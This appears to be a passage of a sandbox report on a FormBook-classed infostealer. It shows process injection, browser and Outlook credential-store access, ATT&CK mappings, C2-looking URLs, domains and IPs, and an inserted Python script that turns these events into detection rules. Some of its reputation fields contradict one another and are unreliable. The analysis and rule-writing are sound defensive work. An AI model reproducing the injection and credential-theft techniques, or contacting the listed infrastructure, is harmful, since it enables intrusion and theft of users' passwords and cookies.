Source: C:\Windows\SysWOW64\findstr.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\findstr.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
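The injection and credential-access signatures above (memory written into the image base of a freshly spawned svchost.exe / ngen.exe, an APC queued into another process, and SysWOW64\findstr.exe opening Chrome/Edge credential stores and the Outlook profile key) are exactly the events a detection engineer would turn into rules. The following is an added example, not part of the Joe Sandbox report: it runs three such rules over the report's behavior lines, transcribed here into a constructed "source | event: detail" form. The rule names, the browser image list and the trailing chrome.exe control line are assumptions of this example.

```python
import re
from collections import defaultdict

# Behavior lines transcribed from the report's signature sections, reduced to
# "<source process> | <event>: <detail>". Constructed input. The final chrome.exe
# line is a benign control: a browser reading its own credential store must not fire.
REPORT_LINES = [
    r"C:\Users\user\Desktop\GJRX21GBj3.exe | Memory written: C:\Windows\System32\svchost.exe base: 400000",
    r"C:\Users\user\Desktop\GJRX21GBj3.exe | Memory written: C:\Windows\System32\svchost.exe base: 401000",
    r"C:\Users\user\Desktop\GJRX21GBj3.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 400000",
    r"C:\Users\user\Desktop\GJRX21GBj3.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 5084008",
    r"C:\Users\user\Desktop\GJRX21GBj3.exe | Process created: C:\Windows\System32\svchost.exe",
    r"C:\Users\user\Desktop\GJRX21GBj3.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe",
    r"C:\Windows\SysWOW64\findstr.exe | Thread APC queued: target process: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe",
    r"C:\Windows\SysWOW64\findstr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"C:\Windows\SysWOW64\findstr.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data",
    r"C:\Windows\SysWOW64\findstr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies",
    r"C:\Windows\SysWOW64\findstr.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook" + "\\",
    r"C:\Program Files\Google\Chrome\Application\chrome.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
]

LINE_RE = re.compile(r"^(?P<src>.+?) \| (?P<event>[^:]+): (?P<detail>.*)$")

# 0x400000 is the default image base of a 32-bit PE. A write to exactly that address
# from another process, into a process the writer itself just created, is the shape of
# PE injection / hollowing (the report unpacks the payload as 4.2.ngen.exe.400000.0).
# Caveat: a relocated (ASLR) image base is not 0x400000, so this catches the common
# case, not every variant.
DEFAULT_IMAGE_BASE = 0x400000

CREDENTIAL_STORES = {"login data", "cookies", "web data", "local state"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}   # assumed allow-list
MAPI_PROFILES = "windows messaging subsystem\\profiles"   # Outlook profile key


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def is_browser_store(path):
    p = path.lower()
    return "\\user data\\" in p and p.rsplit("\\", 1)[-1] in CREDENTIAL_STORES


def analyze(lines):
    """Return a list of findings, each {"rule", "src", "target"}."""
    findings = []
    writes = defaultdict(set)   # (src, target) -> set of written base addresses
    spawned = set()             # (src, child) pairs from "Process created"
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        src, event, detail = m.group("src"), m.group("event"), m.group("detail")
        if event == "Memory written":
            target, base = detail.rsplit(" base: ", 1)
            writes[(src, target)].add(int(base, 16))
        elif event == "Process created":
            spawned.add((src, detail))
        elif event == "Thread APC queued":
            target = detail.split("target process: ", 1)[1]
            if image_name(target) != image_name(src):
                findings.append({"rule": "apc_injection", "src": src, "target": target})
        elif event == "File opened":
            if is_browser_store(detail) and image_name(src) not in BROWSERS:
                findings.append({"rule": "browser_credential_store_access", "src": src, "target": detail})
        elif event == "Key opened":
            if MAPI_PROFILES in detail.lower():
                findings.append({"rule": "outlook_profile_access", "src": src, "target": detail})
    # Correlate after the pass: the write and the spawn can arrive in either order.
    for (src, target), bases in writes.items():
        if DEFAULT_IMAGE_BASE in bases:
            rule = "pe_write_into_spawned_process" if (src, target) in spawned else "pe_write_into_foreign_process"
            findings.append({"rule": rule, "src": src, "target": target})
    return findings


if __name__ == "__main__":
    for f in analyze(REPORT_LINES):
        print(f"{f['rule']:32} {image_name(f['src']):12} -> {f['target']}")
```

The credential rule keys on the process image rather than on the file alone, which is what separates the report's findstr.exe reads from a browser's normal access to its own profile; the injection rule needs both the write at the image base and the spawn from the same parent, so a single "Memory written" line (a debugger, a game cheat, an EDR hook) does not fire it.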

            Remote Access Functionality

Source: Yara match | File source: 4.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2294296870.0000000005BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3924270486.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3925169217.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3924150933.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3925057114.0000000002AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2294356055.0000000005CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (techniques listed per tactic column; a number in parentheses is the hit count printed next to a matched technique, entries without a number are the unmatched matrix template)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Native API (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Access Token Manipulation (1); Process Injection (612); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Virtualization/Sandbox Evasion (3); Access Token Manipulation (1); Process Injection (612); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); Software Packing (1); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: System Time Discovery (1); Security Software Discovery (121); Virtualization/Sandbox Evasion (3); Process Discovery (2); Application Window Discovery (1); File and Directory Discovery (2); System Information Discovery (114); System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Email Collection (1); Archive Collected Data (1); Data from Local System (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph

Behavior Graph ID: 1467022 | Sample: GJRX21GBj3.exe | Start date: 03/07/2024 | Architecture: WINDOWS | Score: 100

Network nodes at the root: www.mg55aa.xyz; www.valerieomage.com; 14 other IPs or domains
Signatures at the root: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 3 other signatures; Performs DNS queries to domains with low reputation (www.mg55aa.xyz)

Process tree ("started" / "injected" is the edge label printed on the graph; a bracketed number is the per-node count printed beside the process):
GJRX21GBj3.exe [1] (started)
    Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
    ngen.exe (started)
        Signatures: Maps a DLL or memory area into another process
        pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe (injected)
            Signatures: Found direct / indirect Syscall (likely to bypass EDR)
            findstr.exe [13] (started)
                Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe (injected)
                    Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                    Network: shops.myshopify.com 23.227.38.74, ports 49711, 80, CLOUDFLARENETUS, Canada
                    Network: www.lacemalt.top 203.161.55.102, ports 49726, 49727, 49728, VNPT-AS-VNVNPTCorpVN, Malaysia
                    Network: 6 other IPs or domains
                firefox.exe (started)
    conhost.exe (started)
    svchost.exe (started)

Antivirus detection (Source | Detection | Scanner | Label)
GJRX21GBj3.exe | 68% | ReversingLabs | Win64.Trojan.LokiBot
Note: the ReversingLabs family label (LokiBot) disagrees with the report's own FormBook verdict; the FormBook attribution rests on the Yara matches against the unpacked payload (4.2.ngen.exe.400000.0.unpack) and the injected-process memory listed above, which is the stronger evidence.
            No Antivirus matches
URL reputation (Source | Detection | Scanner | Label)
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
http://www.valerieomage.com/c7rq/?k06T=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl+OFvVeu4EU857dyc7w4+qhgXRMO7PTzi/X2HMMMtdNC+wv2+smLAouLcyIEijMeq9ccv2ntai0EWGFrkjFC0U/c7k/DTDLA==&rz=LZsl-bkp-XfXeRLp | 0% | Avira URL Cloud | safe
https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js | 0% | Avira URL Cloud | safe
https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark | 0% | Avira URL Cloud | safe
http://www.mg55aa.xyz/7npk/ | 0% | Avira URL Cloud | safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
http://www.siteblogoficialon.com/xti2/ | 0% | Avira URL Cloud | safe
https://aka.ms/nativeaot-c | 0% | Avira URL Cloud | safe
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js | 0% | Avira URL Cloud | safe
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
https://valerieomage.com/c7rq?k06T=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl | 0% | Avira URL Cloud | safe
http://www.lacemalt.top/tb8p/ | 0% | Avira URL Cloud | safe
http://www.mybodyradar.net/nml2/ | 100% | Avira URL Cloud | malware
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js | 0% | Avira URL Cloud | safe
http://www.lacemalt.top/tb8p/?k06T=qOKUC29yX8oZAlbJDfcpCLzpMPZC9WFwxrZXgt1GanD4ODtcEeVG6I3ogONv/wZG3CcBcKt2BHXhpUQRSUiI6LSlbUKGOe5tpqy+YL001eRQtx2Jgk6C84cNpUHQ9eTwUQ==&rz=LZsl-bkp-XfXeRLp | 0% | Avira URL Cloud | safe
https://aka.ms/nativeaot-compatibilityy | 0% | Avira URL Cloud | safe
https://www.kosherphonestore.com/ktbm/?k06T=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkji | 0% | Avira URL Cloud | safe
https://track.uc.cn/collect | 0% | Avira URL Cloud | safe
http://www.kosherphonestore.com/ktbm/ | 0% | Avira URL Cloud | safe
http://www.cwgehkk.store/kwl6/ | 0% | Avira URL Cloud | safe
http://www.lavillitadepapa.com | 0% | Avira URL Cloud | safe
https://hm.baidu.com/hm.js? | 0% | Avira URL Cloud | safe
https://www.siteblogoficialon.com/xti2/?k06T=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC8 | 0% | Avira URL Cloud | safe
https://aka.ms/nativeaot-compatibility | 0% | Avira URL Cloud | safe
http://www.mg55aa.xyz/7npk/?rz=LZsl-bkp-XfXeRLp&k06T=3lhlChS8FYnXqyMl6DrMwk16pFUOD90SHj/DecBTIjGSaQxy34ZC87B+/wA+Ty9En/TQ2WIUU2NJwAlG0p0MOprHpEJhuLS8Xg3IfDdoqaVi1Ch1kdwH1TvR7mgJgyRVyQ== | 0% | Avira URL Cloud | safe
https://aka.ms/GlobalizationInvariantMode | 0% | Avira URL Cloud | safe
http://www.siteblogoficialon.com/xti2/?k06T=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC8+h4eo3ZkplyB9kY6zupybd5FXB5boaSfX9kd7InJ4l2/UGXXDPdESA3G681NsEYfip50N0NMaShmTLM2x7hQcZfKg==&rz=LZsl-bkp-XfXeRLp | 0% | Avira URL Cloud | safe
http://www.lavillitadepapa.com/i1fz/ | 0% | Avira URL Cloud | safe
https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js | 0% | Avira URL Cloud | safe
http://www.kosherphonestore.com/ktbm/?k06T=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz3Hv37r9oCCf0bTqtzy4xv37G1SgBfWJK+jN8eMH36uauFGPXBOtm3yBDVUMLLFQh/MQ7JKdaw==&rz=LZsl-bkp-XfXeRLp | 0% | Avira URL Cloud | safe
http://www.cwgehkk.store/kwl6/?k06T=a60HvCvUhLiFhuUSc8WrKARCzXFsQAvffUZBz2uIU9nHYJX4NGLIPasF9EYqD4O1NmBy69LXG4mImYvzxGn1S/csb+glCs2OenUaXJQynPXKXRJsgC/umNodRP7idNP7JA==&rz=LZsl-bkp-XfXeRLp | 0% | Avira URL Cloud | safe
https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css | 0% | Avira URL Cloud | safe
Domains (Name | IP | Active | Malicious | Reputation)
www.lacemalt.top | 203.161.55.102 | true | false | unknown
www.kosherphonestore.com.cdn.hstgr.net | 84.32.84.130 | true | false | unknown
siteblogoficialon.com | 108.179.193.98 | true | false | unknown
www.mg55aa.xyz | 35.241.34.216 | true | false | unknown
www.cwgehkk.store | 43.155.26.241 | true | false | unknown
shops.myshopify.com | 23.227.38.74 | true | true | unknown
www.lavillitadepapa.com | 74.208.46.171 | true | false | unknown
mybodyradar.net | 3.33.130.190 | true | false | unknown
www.gospelstudygroup.org | unknown | unknown | true | unknown
www.amkmos.online | unknown | unknown | true | unknown
www.mybodyradar.net | unknown | unknown | true | unknown
www.valerieomage.com | unknown | unknown | true | unknown
www.instantmailer.cloud | unknown | unknown | true | unknown
www.kosherphonestore.com | unknown | unknown | true | unknown
www.mcxright.com | unknown | unknown | true | unknown
www.siteblogoficialon.com | unknown | unknown | true | unknown
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation)
http://www.valerieomage.com/c7rq/?k06T=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl+OFvVeu4EU857dyc7w4+qhgXRMO7PTzi/X2HMMMtdNC+wv2+smLAouLcyIEijMeq9ccv2ntai0EWGFrkjFC0U/c7k/DTDLA==&rz=LZsl-bkp-XfXeRLp | true | Avira URL Cloud: safe | unknown
http://www.mg55aa.xyz/7npk/ | false | Avira URL Cloud: safe | unknown
http://www.siteblogoficialon.com/xti2/ | false | Avira URL Cloud: safe | unknown
http://www.lacemalt.top/tb8p/ | false | Avira URL Cloud: safe | unknown
http://www.kosherphonestore.com/ktbm/ | false | Avira URL Cloud: safe | unknown
http://www.lacemalt.top/tb8p/?k06T=qOKUC29yX8oZAlbJDfcpCLzpMPZC9WFwxrZXgt1GanD4ODtcEeVG6I3ogONv/wZG3CcBcKt2BHXhpUQRSUiI6LSlbUKGOe5tpqy+YL001eRQtx2Jgk6C84cNpUHQ9eTwUQ==&rz=LZsl-bkp-XfXeRLp | false | Avira URL Cloud: safe | unknown
http://www.mybodyradar.net/nml2/ | false | Avira URL Cloud: malware | unknown
http://www.cwgehkk.store/kwl6/ | false | Avira URL Cloud: safe | unknown
http://www.mg55aa.xyz/7npk/?rz=LZsl-bkp-XfXeRLp&k06T=3lhlChS8FYnXqyMl6DrMwk16pFUOD90SHj/DecBTIjGSaQxy34ZC87B+/wA+Ty9En/TQ2WIUU2NJwAlG0p0MOprHpEJhuLS8Xg3IfDdoqaVi1Ch1kdwH1TvR7mgJgyRVyQ== | false | Avira URL Cloud: safe | unknown
http://www.lavillitadepapa.com/i1fz/ | false | Avira URL Cloud: safe | unknown
http://www.siteblogoficialon.com/xti2/?k06T=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC8+h4eo3ZkplyB9kY6zupybd5FXB5boaSfX9kd7InJ4l2/UGXXDPdESA3G681NsEYfip50N0NMaShmTLM2x7hQcZfKg==&rz=LZsl-bkp-XfXeRLp | false | Avira URL Cloud: safe | unknown
http://www.cwgehkk.store/kwl6/?k06T=a60HvCvUhLiFhuUSc8WrKARCzXFsQAvffUZBz2uIU9nHYJX4NGLIPasF9EYqD4O1NmBy69LXG4mImYvzxGn1S/csb+glCs2OenUaXJQynPXKXRJsgC/umNodRP7idNP7JA==&rz=LZsl-bkp-XfXeRLp | false | Avira URL Cloud: safe | unknown
http://www.kosherphonestore.com/ktbm/?k06T=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz3Hv37r9oCCf0bTqtzy4xv37G1SgBfWJK+jN8eMH36uauFGPXBOtm3yBDVUMLLFQh/MQ7JKdaw==&rz=LZsl-bkp-XfXeRLp | false | Avira URL Cloud: safe | unknown
URLs found in memory and binary data (Name | Source | Malicious | Antivirus Detection | Reputation)
https://duckduckgo.com/chrome_newtab | findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark | findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js | findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js | findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/nativeaot-c | GJRX21GBj3.exe | false | Avira URL Cloud: safe | unknown
https://valerieomage.com/c7rq?k06T=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl | findstr.exe, 00000007.00000002.3926054651.00000000041F6000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000003876000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2627811818.0000000028C66000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/nativeaot-compatibilityy | GJRX21GBj3.exe | false | Avira URL Cloud: safe | unknown
https://track.uc.cn/collect | findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.kosherphonestore.com/ktbm/?k06T=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkji | findstr.exe, 00000007.00000002.3926054651.000000000451A000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000003B9A000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.ecosia.org/newtab/ | findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js | findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.lavillitadepapa.com | pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925169217.0000000002CE1000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.siteblogoficialon.com/xti2/?k06T=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC8 | findstr.exe, 00000007.00000002.3926054651.0000000004B62000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.00000000041E2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://hm.baidu.com/hm.js? | findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/nativeaot-compatibility | GJRX21GBj3.exe, 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/nativeaot-compatibilityY | GJRX21GBj3.exe | false | none | unknown
https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js | findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/GlobalizationInvariantMode | GJRX21GBj3.exe | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css | findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP               Domain                                    Country         ASN     ASN Name                          Malicious
43.155.26.241    www.cwgehkk.store                         Japan           4249    LILLY-ASUS                        false
203.161.55.102   www.lacemalt.top                          Malaysia        45899   VNPT-AS-VNVNPTCorpVN              false
108.179.193.98   siteblogoficialon.com                     United States   46606   UNIFIEDLAYER-AS-1US               false
74.208.46.171    www.lavillitadepapa.com                   United States   8560    ONEANDONE-ASBrauerstrasse48DE     false
23.227.38.74     shops.myshopify.com                       Canada          13335   CLOUDFLARENETUS                   true
84.32.84.130     www.kosherphonestore.com.cdn.hstgr.net    Lithuania       33922   NTT-LT-ASLT                       false
3.33.130.190     mybodyradar.net                           United States   8987    AMAZONEXPANSIONGB                 false
35.241.34.216    www.mg55aa.xyz                            United States   15169   GOOGLEUS                          false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1467022
Start date and time: 2024-07-03 16:37:58 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 57s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: GJRX21GBj3.exe (renamed because original name is a hash value)
Original Sample Name: 04ca4f891cf5c2c412c58340ec0de521f940f4b36c1b0b7f1aa1fdae080922aa.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@10/1@12/8
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 68%
• Number of executed functions: 75
• Number of non-executed functions: 299
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• VT rate limit hit for: GJRX21GBj3.exe
Time       Type               Description
10:39:49   API Interceptor    6948719x Sleep call for process: findstr.exe modified
Match: Associated Sample Name / URL | Detection | Threat Name | Context

43.155.26.241
  Shipping documents.bat.exe | malicious | FormBook | www.cwgehkk.store/9fu0/
  shipping_doc.bat.exe | malicious | FormBook | www.cwgehkk.store/9fu0/
  SHIPPING_DOCUMENTS.exe | malicious | FormBook | www.cwgehkk.store/9fu0/
  SHIPPING_DOCS.bat.exe | malicious | FormBook | www.cwgehkk.store/9fu0/
  Maersk_Quotation034865374.exe | malicious | FormBook | www.cwgehkk.store/9fu0/

203.161.55.102
